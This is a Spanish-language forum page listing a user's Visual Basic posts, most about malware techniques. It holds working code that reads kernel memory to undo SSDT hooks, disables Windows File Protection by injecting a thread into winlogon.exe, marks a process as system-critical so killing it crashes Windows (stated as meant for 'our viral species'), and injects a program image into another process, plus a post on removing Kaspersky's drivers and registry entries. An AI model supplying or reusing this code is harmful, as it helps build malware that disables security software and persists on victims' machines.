  208.    Dim I As Long, j As Long, Length As Long, Buff() As Byte, pKernelName As Long, hKernel As Long
  209.    Dim dwKSDT As Long, pService As Long, DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
  210.    dwServices = 0
  211.    ZwQuerySystemInformation SystemModuleInformation, 0, 0, VarPtr(Length)
  212.    ReDim Buff(Length - 1)
  213.    ZwQuerySystemInformation SystemModuleInformation, VarPtr(Buff(0)), Length, 0
  214.    With ModuleInformationFromPtr(VarPtr(Buff(4)))
  215.        dwKernelBase = .Base
  216.        pKernelName = VarPtr(.ImageName(0)) + .ModuleNameOffset
  217.    End With
  218.    hKernel = LoadLibraryEx(pKernelName, 0, DONT_RESOLVE_DLL_REFERENCES)
  219.    dwKSDT = GetProcAddress(hKernel, "KeServiceDescriptorTable")
  220.    Assert dwKSDT <> 0
  221.    dwKSDT = dwKSDT - hKernel
  222.    dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT)
  223.    Assert dwKiServiceTable <> 0
  224.    CopyMemory VarPtr(DosHeader), hKernel, 64
  225.    With DosHeader
  226.        Assert .e_magic = &H5A4D
  227.        CopyMemory VarPtr(NtHeader), hKernel + .e_lfanew, 168
  228.    End With
  229.    With NtHeader
  230.        Assert .Signature = &H4550
  231.        Assert .Magic = &H10B
  232.    End With
  233.    pService = hKernel + dwKiServiceTable
  234.    Do While DwordFromPtr(pService) - NtHeader.ImageBase < NtHeader.SizeOfImage
  235.        Address1(dwServices) = DwordFromPtr(pService) - NtHeader.ImageBase + dwKernelBase
  236.        pService = pService + 4
  237.        dwServices = dwServices + 1
  238.    Loop
  239.    FreeLibrary hKernel
  240.    Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
  241.    With QueryBuff
  242.        .Address = dwKernelBase + dwKiServiceTable
  243.        .pData = VarPtr(Address2(0))
  244.        .Length = dwServices * 4
  245.    End With
  246.    ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
  247.    Length = DwordFromPtr(VarPtr(Buff(0)))
  248.    For I = 0 To Length - 1
  249.        With ModuleInformationFromPtr(VarPtr(Buff(I * 284 + 4)))
  250.            For j = 0 To dwServices - 1
  251.                If Address2(j) >= .Base And Address2(j) < .Base + .Size Then
  252.                    ModuleName(j) = StringFromPtr(VarPtr(.ImageName(0)))
  253.                End If
  254.            Next
  255.        End With
  256.    Next
  257.        For I = 0 To dwServices - 1
  258.            If Address1(I) <> Address2(I) Then
  259.                RecoverSSDT I
  260.                WriteSSDT
  261.            End If
  262.        Next
  263. End Sub
  264.  
  265. Private Function StringFromPtr(ByVal pString As Long) As String
  266.    Dim Buff() As Byte, Length As Long
  267.    Length = lstrlen(pString)
  268.    If Length = 0 Then Exit Function
  269.    ReDim Buff(Length - 1)
  270.    CopyMemory VarPtr(Buff(0)), pString, Length
  271.    StringFromPtr = StrConv(Buff, vbUnicode)
  272. End Function
  273.  
  274. Public Sub FindNtdllExport()
  275.    Dim DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER, ExportDirectory As IMAGE_EXPORT_DIRECTORY
  276.    Dim I As Long, hNtdll As Long, FuncRVA() As Long, NameRVA() As Long, Ordinal() As Integer, ThisName As String, ThisNumber As Long
  277.    hNtdll = GetModuleHandle("ntdll.dll")
  278.    Assert hNtdll <> 0
  279.    CopyMemory VarPtr(DosHeader), hNtdll, 64
  280.    With DosHeader
  281.        Assert .e_magic = &H5A4D
  282.        CopyMemory VarPtr(NtHeader), hNtdll + .e_lfanew, 128
  283.    End With
  284.    With NtHeader
  285.        Assert .Signature = &H4550
  286.        Assert .Magic = &H10B
  287.        Assert .SizeOfOptionalHeader >= 104
  288.        Assert .NumberOfRvaAndSizes >= 1
  289.        Assert .ExportTableSize >= 40
  290.        CopyMemory VarPtr(ExportDirectory), hNtdll + .ExportTableRva, 40
  291.    End With
  292.    With ExportDirectory
  293.        Assert StringFromPtr(.name + hNtdll) = "ntdll.dll"
  294.        ReDim FuncRVA(.NumberOfFunctions - .Base), NameRVA(.NumberOfNames - 1), Ordinal(.NumberOfNames - 1)
  295.        CopyMemory VarPtr(FuncRVA(0)), hNtdll + .AddressOfFunctions + .Base * 4, (.NumberOfFunctions - .Base) * 4
  296.        CopyMemory VarPtr(NameRVA(0)), hNtdll + .AddressOfNames, .NumberOfNames * 4
  297.        CopyMemory VarPtr(Ordinal(0)), hNtdll + .AddressOfOrdinals, .NumberOfNames * 2
  298.        For I = 0 To .NumberOfNames - 1
  299.            ThisName = StringFromPtr(hNtdll + NameRVA(I))
  300.        Next
  301.    End With
  302. End Sub
  303.  
  304. Public Function ReadMemory(ByVal Address As Long, ByVal Length As Long) As Byte()
  305.    Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long, Buff() As Byte
  306.    ReDim Buff(Length - 1)
  307.    With QueryBuff
  308.        .Address = Address
  309.        .pData = VarPtr(Buff(0))
  310.        .Length = Length
  311.    End With
  312.    ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
  313.    If ReturnLength = Length Then ReadMemory = Buff
  314. End Function
  315.  
  316. Public Sub Assert(ByVal bBool As Boolean)
  317.    If Not bBool Then
  318.        MsgBox "Assertion Failed!", vbCritical, "Error"
  319.        End
  320.    End If
  321. End Sub
  322.  

4  Programación / Programación Visual Basic / Problema al Eliminar Kaspersky 2009 desde VB en: 23 Marzo 2009, 03:38 am
Realize un programa en VB para eliminar al antivirus kaspersky 2009, funciona perfecto, quite el hook a las apis, luego termine el proceso y por ultimo elimine el driver KLIF.sys y las entradas del registro. pero tengo un problema klim5.sys es el filtro NDIS, y como elimino su entrada en el registro no puedo conectarme a internet desde la maquina en la cual elimine al kaspersky. me toca ir a propiedades del adaptador de red y deshabilitar el Kaspersky Anti-Virus NDIS Filter, y se vuelve a habilitar la conexion. mi pregunta es como puedo hacer esto desde mi codigo en VB?




Gracias de Antemano  ;D
5  Programación / Programación Visual Basic / [SRC] Deshabilitar WFP [Windows File Protection] en: 14 Febrero 2009, 18:26 pm
Esta técnica pone Fin al Hilo SFC Watcher que continuamente espera y responde a la notificación de cambio de directorio o acciones que se señalan.
Para ello SFC_OS.DLL  nos brinda una función sin nombre que podemos exportar con el  ordinal 2: SfcTerminateWatcherThread .. Esta API no acepta parámetros y hace exactamente lo que su nombre implica. Sin embargo, hay una sola manera de usar esta función: Esta debe ser invocada en el proceso que creó el SFC Watcher Thread: winlogon.exe.

Para ello debemos inyectar, y llamar a la función desde el propio Winlogon

Este code deja deshabilitada la Protección hasta el proximo reinicio. pudiendo de esta forma modificar los ficheros del sistema que protege WFP, espero les sea de utilidad.


Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module        : mDisableWFP
  3. ' Fecha         : 15/02/2009 12:10
  4. ' Autor         : XcryptOR
  5. ' Proposito     : Deshabilita la WFP (Windows File Protection)Hasta el proximo Reinicio
  6. ' SO            : Windows XP Sp1, Sp2, Sp3
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Declare Function OpenProcessToken Lib "advapi32.dll" ( _
  10. ByVal ProcessHandle As Long, _
  11. ByVal DesiredAccess As Long, _
  12. TokenHandle As Long) As Long
  13.  
  14. Declare Function CloseHandle Lib "kernel32.dll" ( _
  15. ByVal hObject As Long) As Long
  16.  
  17. Declare Function GetCurrentProcess Lib "kernel32.dll" () As Long
  18.  
  19. Declare Function AdjustTokenPrivileges Lib "advapi32.dll" ( _
  20. ByVal TokenHandle As Long, _
  21. ByVal DisableAllPrivileges As Long, _
  22. ByRef NewState As TOKEN_PRIVILEGES, _
  23. ByVal BufferLength As Long, _
  24. PreviousState As Any, _
  25. ReturnLength As Long) As Long
  26.  
  27. Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" ( _
  28. ByVal lpSystemName As String, _
  29. ByVal lpName As String, _
  30. lpLuid As LUID) As Long
  31.  
  32. Declare Function CreateToolhelp32Snapshot Lib "kernel32.dll" ( _
  33. ByVal dwFlags As Long, _
  34. ByVal th32ProcessID As Long) As Long
  35.  
  36. Declare Function Process32First Lib "kernel32.dll" ( _
  37. ByVal hSnapshot As Long, _
  38. lppe As PROCESSENTRY32) As Long
  39.  
  40. Declare Function Process32Next Lib "kernel32.dll" ( _
  41. ByVal hSnapshot As Long, _
  42. lppe As PROCESSENTRY32) As Long
  43.  
  44. Declare Function OpenProcess Lib "kernel32.dll" ( _
  45. ByVal dwDesiredAccess As Long, _
  46. ByVal bInheritHandle As Long, _
  47. ByVal dwProcessId As Long) As Long
  48.  
  49. Declare Function CreateRemoteThread Lib "kernel32.dll" ( _
  50. ByVal hProcess As Long, _
  51. ByRef lpThreadAttributes As Any, _
  52. ByVal dwStackSize As Long, _
  53. ByVal StartAddress As Long, _
  54. ByRef lpParameter As Any, _
  55. ByVal dwCreationFlags As Long, _
  56. ByRef lpThreadId As Long) As Long
  57.  
  58. Declare Function LoadLibrary Lib "kernel32.dll" Alias "LoadLibraryA" ( _
  59. ByVal lpLibFileName As String) As Long
  60.  
  61. Declare Function GetProcAddress Lib "kernel32.dll" ( _
  62. ByVal hModule As Long, _
  63. ByVal OrdinalNumber As Long) As Long
  64.  
  65. Declare Function FreeLibrary Lib "kernel32.dll" ( _
  66. ByVal hLibModule As Long) As Long
  67.  
  68. Declare Function WaitForSingleObject Lib "kernel32.dll" ( _
  69. ByVal hHandle As Long, _
  70. ByVal dwMilliseconds As Long) As Long
  71.  
  72. Const TOKEN_ALL_ACCESS = 983551
  73. Const PROCESS_ALL_ACCESS = &H1F0FFF
  74. Const TH32CS_SNAPPROCESS As Long = &H2
  75. Const INFINITE = &HFFFF&
  76.  
  77. Type LUID
  78.        LowPart             As Long
  79.        HighPart            As Long
  80. End Type
  81.  
  82. Type LUID_AND_ATTRIBUTES
  83.        pLuid               As LUID
  84.        Attributes          As Long
  85. End Type
  86.  
  87. Type TOKEN_PRIVILEGES
  88.        PrivilegeCount      As Long
  89.        Privileges(1)       As LUID_AND_ATTRIBUTES
  90. End Type
  91.  
  92. Type PROCESSENTRY32
  93.        dwSize              As Long
  94.        cntUsage            As Long
  95.        th32ProcessID       As Long
  96.        th32DefaultHeapID   As Long
  97.        th32ModuleID        As Long
  98.        cntThreads          As Long
  99.        th32ParentProcessID As Long
  100.        pcPriClassBase      As Long
  101.        dwFlags             As Long
  102.        szExeFile           As String * 260
  103. End Type
  104.  
  105. Sub Main()
  106.  
  107.    SetPrivilegies
  108.  
  109.    If DisableWFP = True Then
  110.        MsgBox "Se ha deshabilitado la WFP, hasta el proximo reinicio."
  111.    Else
  112.        MsgBox "Error al abrir winlogon! no se puede desactivar WFP"
  113.    End If
  114.  
  115.  
  116. End Sub
  117.  
  118. '==============================================================================
  119. '================ OBTENER PID (PROCESS ID) DEL NOMBRE =========================
  120. '==============================================================================
  121. Public Function GetPid(szProcess As String)
  122.    On Error Resume Next
  123.  
  124.    Dim Pid         As Long
  125.    Dim l           As Long
  126.    Dim l1          As Long
  127.    Dim l2          As Long
  128.    Dim Ol          As Long
  129.    Dim pShot       As PROCESSENTRY32
  130.  
  131.    l1 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
  132.    pShot.dwSize = Len(pShot)
  133.    l2 = Process32Next(l1, pShot)
  134.    Do While l2
  135.        If InStr(pShot.szExeFile, szProcess) <> 0 Then
  136.            Pid = pShot.th32ProcessID
  137.            GetPid = Pid
  138.        End If
  139.        l2 = Process32Next(l1, pShot)
  140.    Loop
  141.    l = CloseHandle(l1)
  142.  
  143. End Function
  144. '==============================================================================
  145. '=========================== OBTENER PRIVILEGIOS ==============================
  146. '==============================================================================
  147. Sub SetPrivilegies()
  148.  
  149.    Dim hToken      As Long
  150.    Dim pLuid       As LUID
  151.    Dim TokenPriv   As TOKEN_PRIVILEGES
  152.  
  153.    If OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, hToken) = 0 Then
  154.        End
  155.    End If
  156.  
  157.    LookupPrivilegeValue vbNullString, "SeDebugPrivilege", pLuid
  158.  
  159.    With TokenPriv
  160.        .PrivilegeCount = 1
  161.        .Privileges(0).pLuid = pLuid
  162.        .Privileges(0).Attributes = 2
  163.    End With
  164.  
  165.    AdjustTokenPrivileges hToken, 0, TokenPriv, Len(TokenPriv), ByVal 0&, ByVal 0&
  166.    CloseHandle hToken
  167.  
  168. End Sub
  169. '==============================================================================
  170. '==== DESHABILITAR LA WFP (WINDOWS FILE PROTECTION) HASTA PROXIMO REINICIO ====
  171. '==============================================================================
  172.  
  173. Function DisableWFP() As Boolean
  174.  
  175.    Dim LoadDll     As Long
  176.    Dim hProcess    As Long
  177.    Dim RemThread   As Long
  178.    Dim SfcTerminateWatcherThread  As Long
  179.  
  180.    hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, GetPid("winlogon.exe"))
  181.  
  182.    If hProcess = 0 Then
  183.        DisableWFP = False
  184.        End
  185.    End If
  186.  
  187.    LoadDll = LoadLibrary("SFC_OS.DLL")          'sfc_os.dll
  188.    SfcTerminateWatcherThread = GetProcAddress(LoadDll, 2)      'Api SfcTerminateWatcherThread ordinal:#2 de sfc_os.dll
  189.    RemThread = CreateRemoteThread(hProcess, ByVal 0&, 0, ByVal SfcTerminateWatcherThread, ByVal 0&, 0, ByVal 0&)
  190.  
  191.    WaitForSingleObject RemThread, INFINITE
  192.    CloseHandle hProcess
  193.    FreeLibrary LoadDll
  194.    DisableWFP = True
  195.  
  196. End Function
  197.  
6  Programación / Programación Visual Basic / Generador GUID en: 6 Febrero 2009, 15:42 pm
Code Util para utilizar el metodo de inicio ActiveX (ActiveX Startup Method), este code genera un numero unico de la forma: {89B4C1CD-B018-4511-B0A1-5476DBF70820}.
Código
  1. '---------------------------------------------------------------------------------------
  2. ' Module      : mGenGUID
  3. ' Fecha       : 05/02/2009 18:10
  4. ' Autor       : XcryptOR
  5. ' Proposito   : Generar un número de identificación unico
  6. ' Creditos    : Creditos a trilithium, Autor del code original en Delphi
  7. '---------------------------------------------------------------------------------------
  8.  
  9. Option Explicit
  10.  
  11. Private Type GUID
  12.    Data1           As Long
  13.    Data2           As Integer
  14.    Data3           As Integer
  15.    Data4(7)        As Byte
  16. End Type
  17.  
  18. Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" ( _
  19. pDest As Any, _
  20. pSource As Any, _
  21. ByVal dwLength As Long)
  22.  
  23. Private Declare Function StringFromCLSID Lib "ole32" ( _
  24. pclsid As GUID, _
  25. lpsz As Long) As Long
  26.  
  27. Private Declare Function CoCreateGuid Lib "OLE32.DLL" (pGuid As GUID) As Long
  28.  
  29. Public Function GetGUID() As String
  30.    Dim udtGUID     As GUID
  31.    If (CoCreateGuid(udtGUID) = 0) Then
  32.        GetGUID = GUIDToStr(udtGUID)
  33.    End If
  34. End Function
  35.  
  36. Private Function GUIDToStr(ID As GUID) As String
  37.    Dim strRet      As String
  38.    Dim ptrSource   As Long
  39.    Dim lngRet      As Long
  40.  
  41.    strRet = Space(38)
  42.    lngRet = StringFromCLSID(ID, ptrSource)
  43.    If lngRet = 0 Then
  44.        CopyMemory ByVal StrPtr(strRet), ByVal ptrSource, 76
  45.        GUIDToStr = strRet
  46.    End If
  47. End Function
7  Programación / Programación Visual Basic / Actualizar Datagrid despues de eliminar un registro en: 18 Enero 2009, 21:30 pm
Hola, tengo un pequeño gran inconveniente, es lo unico en lo que no he podido de mi proyecto , la verdad he googleado bastante y nada, ojala y alguno de ustedes pueda ayudarme.

lo que necesito es que al eliminar un registro de mi base de datos, el datagrid que los muestra en el form se actualize y ya no me muestre el dato eliminado, muchas gracias
8  Programación / Programación Visual Basic / API RtlSetProcessIsCritical en: 11 Noviembre 2008, 23:41 pm
Bueno este code hace uso de un API nativa de NTDLL.dll la cual setea nuestro proceso como un proceso critico del sistema al igual que winlogon o csrss, bueno el resultado de terminar nuestro proceso dara como resultado la BSOD (Blue Screen Of Death) de windows, espero les sea de utilidad, aplicandolo a nuestra especie viral haria que nuestro proceso no se pudiera terminar. casi interminable.

Codigo del Form:

Código
  1. '*************************************************************************
  2. '*************************************************************************
  3. ' Uso de RtlSetProcessIsCritical para setear nuestro proceso, como proceso
  4. ' critico del sistema: del mismo modo que csrss.exe o winlogon
  5. ' XcryptOR - Made In Colombia
  6. '**************************************************************************
  7. '*************************************************************************
  8. Private Sub Form_Load()
  9. On Error Resume Next
  10. ObtenerPrivilegios SE_DEBUG_NAME ' obtiene privilegios de Debugeo
  11. Call RtlSetProcessIsCritical(0, 0, 1) ' setea nuestro proceso como Proceso Critico
  12. End Sub
  13.  

Codigo Modulo:

Código
  1. Option Explicit
  2.  
  3. Private Const ANYSIZE_ARRAY = 1
  4. Private Const TOKEN_ADJUST_PRIVILEGES = &H20
  5. Private Const TOKEN_QUERY = &H8
  6. Private Const SE_PRIVILEGE_ENABLED = &H2
  7.  
  8. Private Type LUID
  9.    LowPart As Long
  10.    HighPart As Long
  11. End Type
  12. Private Type LUID_AND_ATTRIBUTES
  13.        pLuid As LUID
  14.        Attributes As Long
  15. End Type
  16. Private Type TOKEN_PRIVILEGES
  17.    PrivilegeCount As Long
  18.    Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
  19. End Type
  20.  
  21.  
  22. Private Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
  23. Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLUID As LUID) As Long
  24. Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
  25. Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
  26.  
  27.  
  28.  
  29. Public Const SE_DEBUG_NAME As String = "SeDebugPrivilege"
  30.  
  31.  
  32. Public Declare Function RtlSetProcessIsCritical Lib "ntdll.dll" (ByVal NewValue As Boolean, ByVal OldValue As Boolean, ByVal WinLogon As Boolean)
  33.  
  34. Public Function ObtenerPrivilegios(ByVal privilegio As String) As Long
  35.  
  36. Dim lpLUID As LUID
  37. Dim lpToken As TOKEN_PRIVILEGES
  38. Dim lpAntToken As TOKEN_PRIVILEGES
  39. Dim hToken As Long
  40. Dim hProcess As Long
  41. Dim res As Long
  42.  
  43. hProcess = GetCurrentProcess()
  44. res = OpenProcessToken(hProcess, TOKEN_ADJUST_PRIVILEGES Or TOKEN_QUERY, hToken)
  45. If res = 0 Then
  46.    Exit Function
  47. End If
  48. res = LookupPrivilegeValue(vbNullString, privilegio, lpLUID)
  49. If res = 0 Then
  50.    Exit Function
  51. End If
  52. With lpToken
  53.    .PrivilegeCount = 1
  54.    .Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
  55.    .Privileges(0).pLuid = lpLUID
  56. End With
  57.  
  58. res = AdjustTokenPrivileges(hToken, False, lpToken, Len(lpToken), lpAntToken, Len(lpAntToken))
  59. If res = 0 Then
  60.    Exit Function
  61. End If
  62. ObtenerPrivilegios = res
  63. End Function
  64.  

saludos
9  Programación / Programación Visual Basic / EXE Injection en: 7 Octubre 2008, 15:41 pm
tengo una duda, la inyección de code solo se puede hacer a otro ejecutable en VB, oh podria inyectar mi code a explorer.exe?

podria alguien postear algun code que sirva.

Código
  1. Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
  2. Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal ProcessHandle As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
  3. Public Declare Function VirtualFreeEx Lib "kernel32" (ByVal ProcessHandle As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
  4. Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
  5. Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  6. Public Declare Function CreateRemoteThread Lib "kernel32" (ByVal ProcessHandle As Long, lpThreadAttributes As Long, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
  7. Public Declare Function GetModuleHandleA Lib "kernel32" (ByVal ModName As String) As Long
  8. Public Declare Function WriteProcessMemory Lib "kernel32" (ByVal ProcessHandle As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nsize As Long, lpNumberOfBytesWritten As Long) As Long
  9. Public Declare Function LoadLibrary Lib "kernel32" Alias "LoadLibraryA" (ByVal lpLibFileName As String) As Long
  10. Public Declare Function MessageBox Lib "user32" Alias "MessageBoxA" (ByVal hwnd As Long, ByVal lpText As String, ByVal lpCaption As String, ByVal wType As Long) As Long
  11. Public Declare Function DeleteFile Lib "kernel32" Alias "DeleteFileA" (ByVal lpFileName As String) As Long
  12. Public Declare Function CreateEvent Lib "kernel32" Alias "CreateEventA" (ByVal lpEventAttributes As Long, ByVal bManualReset As Long, ByVal bInitialState As Long, ByVal lpname As String) As Long
  13. Public Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hmodule As Integer, ByVal lpFileName As String, ByVal nsize As Integer) As Integer
  14. Public Declare Sub ExitThread Lib "kernel32" (ByVal dwExitCode As Long)
  15. Public Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)
  16.  
  17. Const MEM_COMMIT = &H1000
  18. Const MEM_RESERVE = &H2000
  19. Const MEM_RELEASE = &H8000
  20. Const PAGE_EXECUTE_READWRITE = &H40&
  21. Const IMAGE_NUMBEROF_DIRECTIRY_ENRIES = 16
  22. Const STANDARD_RIGHTS_REQUIRED = &HF0000
  23. Const SYNCHRONIZE = &H100000
  24. Const PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF)
  25.  
  26. Type IMAGE_DATA_DIRECTORY
  27.    VirtualAddress As Long
  28.    Size As Long
  29. End Type
  30.  
  31. Type IMAGE_FILE_HEADER
  32.    Machine As Integer
  33.    NumberOfSections As Integer
  34.    TimeDataStamp As Long
  35.    PointerToSymbolTable As Long
  36.    NumberOfSymbols As Long
  37.    SizeOfOptionalHeader As Integer
  38.    Characteristics As Integer
  39. End Type
  40.  
  41. Type IMAGE_OPTIONAL_HEADER32
  42.    Magic As Integer
  43.    MajorLinkerVersion As Byte
  44.    MinorLinkerVersion As Byte
  45.    SizeOfCode As Long
  46.    SizeOfInitalizedData As Long
  47.    SizeOfUninitalizedData As Long
  48.    AddressOfEntryPoint As Long
  49.    BaseOfCode As Long
  50.    BaseOfData As Long
  51.    ImageBase As Long
  52.    SectionAlignment As Long
  53.    FileAlignment As Long
  54.    MajorOperatingSystemVersion As Integer
  55.    MinorOperatingSystemVersion As Integer
  56.    MajorImageVersion As Integer
  57.    MinorImageVersion As Integer
  58.    MajorSubsystemVersion As Integer
  59.    MinorSubsystemVersion As Integer
  60.    Reserved1 As Long
  61.    SizeOfImage As Long
  62.    SizeOfHeaders As Long
  63.    CheckSum As Long
  64.    Subsystem As Integer
  65.    DllCharacteristics As Integer
  66.    SizeOfStackReserve As Long
  67.    SizeOfStackCommit As Long
  68.    SizeOfHeapReserve As Long
  69.    SizeOfHeapCommit As Long
  70.    LoaerFlags As Long
  71.    NumberOfRvaAndSizes As Long
  72.    DataDirectory(IMAGE_NUMBEROF_DIRECTIRY_ENRIES - 1) As IMAGE_DATA_DIRECTORY
  73. End Type
  74.  
  75. Type test
  76.    t1 As Long
  77. End Type
  78.  
  79. Type IMAGE_DOS_HEADER
  80.    e_magic As Integer
  81.    e_cblp As Integer
  82.    e_cp As Integer
  83.    e_crlc As Integer
  84.    e_cparhdr As Integer
  85.    e_minalloc As Integer
  86.    e_maxalloc As Integer
  87.    e_ss As Integer
  88.    e_sp As Integer
  89.    e_csum As Integer
  90.    e_ip As Integer
  91.    e_cs As Integer
  92.    e_lfarlc As Integer
  93.    e_onvo As Integer
  94.    e_res(3) As Integer
  95.    e_oemid As Integer
  96.    e_oeminfo As Integer
  97.    e_res2(9) As Integer
  98.    e_lfanew As Long
  99. End Type
  100. Const szTarget As String = "project1"
  101. Dim szSharedData As String * 261
  102. Public Sub Main()
  103. ' Sub that will start when the program is run
  104. Dim PID As Long, ProcessHandle As Long
  105. Dim Size As Long, BytesWritten As Long, TID As Long, Module As Long, NewModule As Long
  106. Dim PImageOptionalHeader As IMAGE_OPTIONAL_HEADER32, PImageDosHeader As IMAGE_DOS_HEADER, TImageFileHeader As IMAGE_FILE_HEADER, TestType As test
  107.  
  108. GetModuleFileName 0, szSharedData, 261
  109.  
  110. GetWindowThreadProcessId FindWindow(vbNullString, szTarget), PID
  111.  
  112. ProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID)
  113.  
  114. Module = GetModuleHandleA(vbNullString)
  115.  
  116. CopyMemory PImageDosHeader, ByVal Module, Len(PImageDosHeader)
  117.  
  118. CopyMemory PImageOptionalHeader, ByVal (Module + PImageDosHeader.e_lfanew + 4 + Len(TImageFileHeader)), Len(PImageOptionalHeader)
  119.  
  120. Size = PImageOptionalHeader.SizeOfImage
  121.  
  122.  
  123. VirtualFreeEx ProcessHandle, Module, 0, MEM_RELEASE
  124.  
  125. NewModule = VirtualAllocEx(ProcessHandle, Module, Size, MEM_RESERVE Or MEM_COMMIT, PAGE_EXECUTE_READWRITE)
  126.  
  127. WriteProcessMemory ProcessHandle, ByVal NewModule, ByVal Module, Size, BytesWritten
  128.  
  129. CreateRemoteThread ProcessHandle, ByVal 0, 0, ByVal GetAdd(AddressOf HijackModule), ByVal Module, 0, TID
  130.  
  131. MsgBox "Handle of the process is: " & ProcessHandle & vbCrLf & "Callback of HijackModule is: " & GetAdd(AddressOf HijackModule) & vbCrLf & "Handle of module is: " & Module & vbCrLf & "Size of module is: " & Size & vbCrLf & "Memory was allocated at: " & NewModule & vbCrLf & "Thread created with handle: " & TID
  132. End Sub
  133.  
  134. Private Function GetAdd(Entrypoint As Long) As Long
  135. GetAdd = Entrypoint
  136. End Function
  137.  
  138. Public Function HijackModule(Stuff As Long) As Long
  139. MessageBox 0, "I am inside a hijacked application", "Hello!", 0
  140. MessageBox 0, "Close the ""Inject"" message box and then delete me", "Hello!", 0
  141. MessageBox 0, "You see? I am still running even if you deleted me.", "Hello!", 0
  142. End Function
  143.  
  144.  

he estado intentando pero sin exito, agradeceria cualquier aporte que me puedan brindar,

Gracias.
10  Programación / Programación Visual Basic / Enviar URL a live messenger en: 26 Agosto 2008, 00:28 am
quisiera saber si hay alguna forma de enviar una URL a la ventana de chat del live messenger, de esta forma

Código:
<A href="http://myurl.com/">Mi URL</A>.

lo que quiero es mediante sendkeys enviar la URL
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines